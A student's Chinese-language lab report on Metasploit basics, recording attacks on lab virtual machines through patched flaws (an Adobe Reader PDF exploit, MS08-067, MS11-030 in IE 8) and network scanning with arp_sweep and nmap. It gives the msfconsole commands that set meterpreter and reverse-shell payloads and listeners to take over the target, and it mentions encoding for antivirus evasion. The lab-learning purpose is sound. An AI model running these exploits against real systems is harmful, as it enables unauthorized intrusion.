20145205武钰_Exp5 MSF基础应用
实验后回答问题
exploit:这个词本身只是利用,但是它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。但是对我来说这个词就是一个简单的指令执行词,就是个指令代码,并没有什么特别的,就是我们需要在MSF中进行执行了,敲一下就好。
payload:其实吧我对这个词理解不深,就感觉是我们的恶意代码要在靶机中可以做的事情,其实就是我们生产的恶意代码具体可以干什么。
encode:在我们学习了英语后我们都知道“en”是一个动词,所以encode就是对于我们之前的恶意代码进行一个再编译的过程,达到我们的目的——免杀
实验感想
我们这个的实验是用已经被修补的漏洞,然后我们只是在前人的基础上感受了一把通过微软漏洞进行的攻击的感觉,只要我们平时及时下载补丁,修补我们的漏洞,其实黑客是很难对我们进行漏洞的渗透攻击的,而且我们也要注意上网习惯,注意一些的奇怪的域名,小心被“钓鱼“,而且我感觉这次实验的实际步骤应该是先进行局域网内的端口扫描,获得目标靶机的IP地址,之后进行主动攻击,获得目标机的权限,之后或是传输到靶机生产的PDF文件,或是将靶机的浏览器主页换成我们的钓鱼网页都是可以的。
还有就是为了找到一个和大家不相同的漏洞,本来是想在MSF里直接搜一个挑个来做的,但是密密麻麻的英文让我退却了,然后就在百度上自己随便输了个漏洞年号,之后去看常用的搜索项,也是佩服我自己的聪明才智。
实践过程记录
Adobe阅读器渗透攻击
实验准备
两台虚拟机,其中一台为
kali
,一台为windows xp sp3
首先在实验前我们可以打开KALI中的显示隐藏文件夹,或是我们不打开显示隐藏文件,可以使用我们的之前实验中用到的netcat进行传输。
还要注意的一点是保证两台虚拟机可以ping通,无论是nat还是桥接通了就可以,为了ping通的话需要关闭防火墙。
实验步骤
- 在kali终端中开启msfconsole
- 输入命令
use exploit/windows/fileformat/adobe_cooltype_sing
进入该漏洞模块 - 使用命令
set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷 - 输入命令
show options
显示模块设定参数,然后按照我们自己的情况进行修改
- 在设定完成后,生产PDF文件,然后将PDF文件拖入到靶机中,之后就像是我们之前做的恶意代码实验一样。
- 建立一个监听模块,
use exploit/multi/handler
- 使用
set payload windows/meterpreter/reverse_tcp
建立一个可靠的反弹链接,监听模块的端口也是需要我们按照自己的情况进行设定的。 - 最后
exploit
开启监听模块在靶机中打开问题PDF,即可获得靶机权限。
- 但是这种方式靶机那边的PDF并不会打开,就像是程序崩溃的感觉一样,但是如果关闭了问题PDF文件,靶机同kali的链接就会中断,而且我们也可以通过网络资源发现靶机正在和kali进行链接。
MS08_067漏洞渗透攻击实践
实验准备
- 两台虚拟机,其中一台为
kali
,一台为windows xp sp3
- 预先设置虚拟机网络,保证两台虚拟机间可以ping通。
实验过程
- 首先我们在知道了具体的漏洞号之后,在进行MSF后,输入
search ms08_067
,会显示出找到的渗透模块,如下图所示:
- 输入
use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用,在输入命令时时不时TAB
一下会省很多功夫,建议没事多点一下TAB
- 之后依然是设置有效攻击载荷,输入
set payload generic/shell_reverse_tcp
进入载荷模块,之后show options
查看具体参数,然后修改参数。
- 这里我们需要注意点的一点是,
LHOST
是本机地址,RHOST
是靶机IP,设置好后,输入我们的开启攻击的号角exploit
- 对比可知我们获得了靶机的管理员权限
IE浏览器渗透攻击——MS11030安全漏洞
实验准备
- 两台虚拟机,其中一台为
kali
,一台为windows 7
,浏览器版本为IE 8 - 预先设置虚拟机网络,保证两台虚拟机间可以ping通。
实验过程
- 首先进入漏洞模块,因为我们已知漏洞号之间进行漏洞模块,进入之后显示一下参数,然后根据我们的自身情况设置一下参数
- 这里我们设置的错误路径为
baidu.com
,端口自己随意就好,尽量不要和已知使用端口占用进行冲突,然后我们设置攻击载荷。
- 还是老套路,根据自己kali情况设置本地IP和端口,之后输入
exploit
启动漏洞服务,等待靶机那个“一个不小心”输入了一长串我们的钓鱼网址
- 这时在靶机的浏览器中输入
http://kali ip:port/uripath
也就是输入对应的我们上面设置的参数
- 稍作等待,kali这边就会有成功链接的反应
- 之后输入
sessions
查看一下MSF中的会话情况,找到我们和win7
的会话编号
- 输入
sessions -i 会话ID
进入我们要进入的会话中,就会发现我们以后获取了靶机的权限
- 这是我们
win 7
的IP地址
辅助模块的实践
实验前准备
- 将kali机的模式改为桥接模式,因为这个在实际应用中最好我们可以使用公网地址,虽然这样会被抓,或是在无线局域网中使用桥接模式,可以保证和其他在这个局域网中的主机在同一个网段中,可以ping通。
- 本次实验是实践一下两种进行网络中对于其他主机扫描的辅助模块
- 为了提升一下扫描速度,我们可以预先建立msf数据库,在kali的终端中依次输入以下命令
service postgresql start
之后输入msfdb start
- 然后进入msf
- 输入
use auxiliary/scanner/discovery/arp_sweep
进入模块,然后输入show options
查看并修改参数
- 然后根据自身的情况修改参数
- 然后就可以开始扫描了了,因为是辅助模块,并没有进行漏洞渗透攻击,所以我们的启动指令是
run
,然后可以看到这个局域网中除了自己的主机,其他的主机,因为我当时只开了kali,所以只会扫描到我的win 10主机
- 在确认可以ping通后,使用nmap进行开放端口扫描,探知该主机开放的端口和服务